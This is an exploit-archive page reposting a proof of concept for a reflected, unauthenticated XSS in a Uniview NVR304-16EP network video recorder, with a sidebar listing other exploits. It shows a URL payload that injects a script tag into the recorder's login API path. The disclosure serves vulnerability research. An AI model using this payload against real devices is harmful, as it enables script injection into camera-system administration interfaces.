Network video recorder nvr30416ep reflected crosssite scripting (xss) (unauthenticated) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2022-02-16 | Type : webapps | Platform : hardware
This exploit / vulnerability Network video recorder nvr30416ep reflected crosssite scripting (xss) (unauthenticated) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
# Author: Luis Martinez
# Discovery Date: 2022-02-13
# Vendor Homepage: https://www.uniview.com/Products/NVR/Easy/NVR304-S-P/#~Product%20features
# Datasheet of NVR304-S-P: https://www.uniview.com/download.do?id=1819568
# Tested Version: NVR304-16EP
# Tested on: Windows 10 Pro 21H2 x64 es - Firefox 91.6.0esr
# Vulnerability Type: Reflected Cross-Site Scripting (XSS)
# CVE: N/A

# Proof of Concept:

http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('XSS')</script>

Network video recorder nvr30416ep reflected crosssite scripting (xss) (unauthenticated)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Network video recorder nvr30416ep reflected crosssite scripting (xss) (unauthenticated) Vulnerability / Exploit